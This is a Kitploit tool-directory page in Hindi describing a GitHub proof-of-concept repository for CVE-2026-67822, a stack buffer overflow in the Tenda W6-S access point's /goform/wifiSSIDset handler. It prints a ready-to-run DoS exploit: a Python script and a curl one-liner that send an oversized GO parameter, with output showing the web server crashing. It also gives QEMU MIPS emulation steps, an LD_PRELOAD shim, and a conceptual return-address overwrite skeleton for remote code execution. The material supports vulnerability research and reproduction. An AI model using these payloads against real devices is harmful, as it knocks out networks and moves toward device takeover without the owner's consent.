Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
go-without-bounds-cve-2026-67822-stack-overflow-in-tenda-w6-s-wifissidset — CVE-2026-67822 के लिए PoC, Tenda W6-S /goform/wifiSSIDset में स्टैक ओवरफ्लो: DoS रिप्रोड्यूसर, QEMU MIPS शिम, और अवधारणात्मक RCE पेलोड स्केलेटन। | Kitploit
उपकरण/GitHubGitHub/hunt-benito/go-without-bounds-cve-2026-67822-stack-overflow-in-tenda-w6-s-wifissidset
एम्बेडेड सिस्टम सुरक्षागतिशील विश्लेषण (सैंडबॉक्सिंग)IoT सुरक्षाभेद्यता विश्लेषणशोषणहार्डवेयर और IoT सुरक्षापेलोड डेवलपमेंटफर्मवेयर विश्लेषणबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubhunt-benito/go-without-bounds-cve-2026-67822-stack-overflow-in-tenda-w6-s-wifissidset

go-without-bounds-cve-2026-67822-stack-overflow-in-tenda-w6-s-wifissidset

CVE-2026-67822 के लिए PoC, Tenda W6-S /goform/wifiSSIDset में स्टैक ओवरफ्लो: DoS रिप्रोड्यूसर, QEMU MIPS शिम, और अवधारणात्मक RCE पेलोड स्केलेटन।

रिपॉजिटरी देखें
101 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-67822 — टेंडा W6-S wifiSSIDset स्टैक बफर ओवरफ्लो (PoC)

हंट-बेनिटो लेख के लिए साथी PoC "GO बिना सीमा के: CVE-2026-67822 — टेंडा W6-S के wifiSSIDset फ़ॉर्म हैंडलर में स्टैक ओवरफ्लो"।

CVE-2026-67822 (CVSS 9.8 क्रिटिकल, CWE-121) एक स्टैक-आधारित बफर ओवरफ्लो है formwrlSSIDset() में, जो टेंडा W6-S वायरलेस एक्सेस पॉइंट के /bin/httpd (एक GoAhead-व्युत्पन्न वेब सर्वर) के /goform/wifiSSIDset एंडपॉइंट के पीछे का C फ़ंक्शन है।

root@kitploit:~
char  v34[64];                                  /* 64-byte stack buffer       */
GO    = websGetVar(a1, "GO",    "wireless_basic.asp");
index = websGetVar(a1, "index", "0");
sprintf(v34, "/%s?index=%s", GO, index);        /* unbounded -> stack overflow */

पुष्ट प्रभाव: सेवा से वंचित (httpd क्रैश)। संभावित प्रभाव: रिमोट कोड निष्पादन (MIPS, बिना स्टैक कैनरी / बिना ASLR वाला बिल्ड)।


रिपॉजिटरी सामग्री


त्वरित प्रारंभ: DoS पुनरुत्पादन

वास्तविक W6-S (डिफ़ॉल्ट LAN IP 192.168.5.10) या एक इम्यूलेटेड इंस्टेंस के विरुद्ध:

root@kitploit:~
$ python3 poc_dos.py --target http://192.168.5.10
[*] Target  : http://192.168.5.10/goform/wifiSSIDset
[*] Payload : GO = 2000 bytes ('A'), index = 0
[*] Sending POST...
[+] HTTP response: 200 (httpd accepted the request before crashing)
[*] Re-probing the management interface...
[!] httpd no longer responds (connection refused) — service crashed.
[+] Result: denial of service CONFIRMED.

समतुल्य वन-लाइनर:

root@kitploit:~
$ curl -s http://192.168.5.10/goform/wifiSSIDset \
    -d "GO=$(python3 -c "print('A'*2000)")&wl_radio=0&index=0"

अनुरोध लौटने के बाद, प्रबंधन इंटरफ़ेस पावर-साइकिल तक मृत रहता है।


हार्डवेयर के बिना पुनरुत्पादन (QEMU MIPS + fake_apmib.so)

/bin/httpd वास्तविक टेंडा सिलिकॉन (libapmib.so, cfmd डेमॉन, एक LAN MAC) की अपेक्षा करता है। fake_apmib.c शिम इनमें से पर्याप्त हिस्से को नकली बनाता है ताकि httpd एक इम्यूलेटेड फ़र्मवेयर फाइलसिस्टम के अंदर बूट हो सके। यह सेटअप मूल शोधकर्ता की तकनीक को दर्शाता है।

1. MIPS बिग-एंडियन के लिए शिम बनाएं

root@kitploit:~
$ mips-linux-gnu-gcc -shared -fPIC -o fake_apmib.so fake_apmib.c

2. होस्ट नेटवर्किंग — ब्रिज + TAP

root@kitploit:~
$ sudo brctl addbr virbr0
$ sudo ifconfig virbr0 192.168.5.1/24 up
$ sudo tunctl -t tap0
$ sudo ifconfig tap0 192.168.5.11/24 up
$ sudo brctl addif virbr0 tap0

3. MIPS Malta गेस्ट बूट करें

root@kitploit:~
$ sudo qemu-system-mips -M malta \
    -kernel vmlinux-3.2.0-4-4kc-malta \
    -hda debian_wheezy_mips_standard.qcow2 \
    -append "root=/dev/sda1" \
    -netdev tap,id=tapnet,ifname=tap0,script=no \
    -device rtl8139,netdev=tapnet \
    -nographic

4. गेस्ट के अंदर: इंटरफ़ेस कॉन्फ़िगर करें और फ़र्मवेयर स्टेज करें

root@kitploit:~
guest# ifconfig eth0 192.168.5.10
# copy the extracted firmware filesystem + the shim onto the guest
$ scp ./squashfs-root.tar.gz  [email protected]:/root/
$ scp ./fake_apmib.so         [email protected]:/root/squashfs-root/

5. Chroot करें और शिम के साथ httpd लॉन्च करें

root@kitploit:~
guest# mount -o bind /proc ./squashfs-root/proc
guest# mount -o bind /dev  ./squashfs-root/dev
guest# rm ./squashfs-root/webroot && ln -s /webroot_ro ./squashfs-root/webroot
guest# chroot ./squashfs-root/ /bin/sh
chroot# mkdir -p /var/run /tmp && chmod 1777 /tmp
chroot# LD_PRELOAD=/fake_apmib.so /bin/httpd &

प्रबंधन इंटरफ़ेस अब http://192.168.5.10 पर पहुंच योग्य है (डिफ़ॉल्ट लॉगिन admin / admin), और poc_dos.py इसके विरुद्ध ठीक उसी तरह काम करता है जैसे वास्तविक हार्डवेयर के विरुद्ध।

टेंडा के आंतरिक apmib/cfmd हेल्पर्स के सटीक प्रोटोटाइप फ़र्मवेयर बिल्ड के अनुसार भिन्न होते हैं। उन्हें अपने लक्ष्य की वास्तविक libapmib.so (objdump -T libapmib.so / IDA) के विरुद्ध सत्यापित करें और आवश्यकतानुसार fake_apmib.c समायोजित करें।


अवधारणात्मक RCE पथ

exploit_conceptual.py DoS से परे शोषण आकार का दस्तावेजीकरण करता है:

root@kitploit:~
# 1) Find the offset from the GO buffer to saved $ra on YOUR firmware build
$ python3 exploit_conceptual.py --target http://192.168.5.10 probe --len 256
# (read the faulting $ra / PC from the QEMU crash dump or a gdb stub, then
#  feed it to cyclic_offset() to recover the exact offset)

# 2) Build a payload that overwrites $ra with a chosen address
$ python3 exploit_conceptual.py --target http://192.168.5.10 build --offset <N> --ra 0x<AABBCCDD>

यह स्केलेटन केवल $ra को पुनर्निर्देशित करता है। हाइजैक को वास्तविक कोड निष्पादन में बदलने के लिए या तो गैर-NX-स्टैक शेलकोड या विशिष्ट फ़र्मवेयर इमेज में गैजेट्स से इकट्ठी की गई ROP श्रृंखला की आवश्यकता होती है — दोनों बिल्ड-विशिष्ट हैं और जानबूझकर शोधकर्ता पर छोड़े गए हैं। DoS की पुष्टि हो चुकी है; RCE वह संभावित सबसे खराब स्थिति है जिसे CVSS वेक्टर (C:H/I:H) दर्शाता है।


कानूनी / जिम्मेदार उपयोग

यह कोड केवल अधिकृत सुरक्षा अनुसंधान के लिए है। इसे केवल उन डिवाइसों के विरुद्ध चलाएं जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। इसे उन नेटवर्कों या हार्डवेयर के विरुद्ध उपयोग न करें जिन्हें आप नियंत्रित नहीं करते हैं।

संदर्भ

  • NIST NVD — CVE-2026-67822: https://nvd.nist.gov/vuln/detail/CVE-2026-67822
  • मूल PoC राइटअप (trister): https://github.com/Tristerjh/Tenda/blob/main/Tenda_W6-S_GO_overflow.md
  • MITRE CWE-121: https://cwe.mitre.org/data/definitions/121.html
  • टेंडा W6-S उत्पाद पृष्ठ: https://www.tendacn.com/material/show/103478
टूल डाउनलोड करें
प्रभावित उत्पादटेंडा W6-S वायरलेस एक्सेस पॉइंट
प्रभावित फ़र्मवेयरv1.0.0.4(510)
CVSS v3.19.8 क्रिटिकल (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWECWE-121 (स्टैक-आधारित बफर ओवरफ्लो)
कमजोर एंडपॉइंटPOST /goform/wifiSSIDset (पैरामीटर GO, index)
खोजकर्ता / श्रेयtrister
फ़ाइलउद्देश्य
poc_dos.pyपुष्ट DoS रिप्रोड्यूसर। अत्यधिक बड़ा GO पैरामीटर भेजता है और परिणामी httpd क्रैश का पता लगाता है। केवल स्टैंडर्ड लाइब्रेरी — कोई निर्भरता नहीं।
exploit_conceptual.pyअवधारणात्मक RCE स्केलेटन। कंट्रोल-फ्लो-हाइजैक आकार (सेव $ra तक पैडिंग, अधिलेखन) और $ra तक के ऑफसेट को अनुभवजन्य रूप से प्राप्त करने हेतु एक साइक्लिक-पैटर्न सहायक प्रदर्शित करता है। इसमें कार्यशील शेलकोड या गैजेट पते नहीं होते।
fake_apmib.cLD_PRELOAD शिम जो टेंडा हार्डवेयर/MIB कॉल को नकली बनाता है ताकि /bin/httpd QEMU MIPS गेस्ट के तहत बूट हो सके — बिना भौतिक डिवाइस के बग को पुनरुत्पादित करने के लिए उपयोग की गई तकनीक।
शिम इंटरसेप्ट करता हैलौटाता हैक्यों
apmib_init()1हार्डवेयर/MIB प्रारंभिकरण छोड़ें
ConnectCfm()1दिखावा करें कि cfmd डेमॉन ने उत्तर दिया
GetValue("lan.ip", …)192.168.5.10स्थिर प्रबंधन IP
ioctl(SIOCGIFHWADDR)00:11:22:33:44:55नकली MAC
connect()पासथ्रूयूनिक्स-सॉकेट/TCP कनेक्ट पारित हो जाते हैं